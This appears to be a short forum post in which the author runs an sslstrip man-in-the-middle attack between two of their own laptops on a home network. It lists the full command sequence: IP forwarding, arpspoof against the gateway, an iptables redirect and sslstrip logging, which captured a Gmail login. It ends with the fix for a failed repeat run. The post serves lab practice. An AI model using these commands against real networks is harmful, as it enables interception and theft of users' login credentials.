I set up sslstrip on BT4 and it worked absolutely fine the first time (on my own home network). Set up is two laptops, attacker and victim.
The commands are:
echo 1 > /proc/sys/net/ipv4/ip_forward
(in other shell window)
arpspoof -i eth0 -t 192.168.2.5 192.168.2.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
python sslstrip.py -w logfile
I then stopped the sslstrip session by entering ^C and then viewed the logfile which had all the correct info in it. I then shut down the attacker machine without killing any other processes (such as arpspoof), and put the victim laptop into sleep.
Later, I tried to repeat the exercise, but it didnt work. On the victim machine, I was getting https login page with gmail, whereas in the first attempt it was http. Secondly, the logfile was empty. I tried several times since then, and rebooted the router, but still no luck.
I figured it out. I needed to run "iptables --flush" at the root.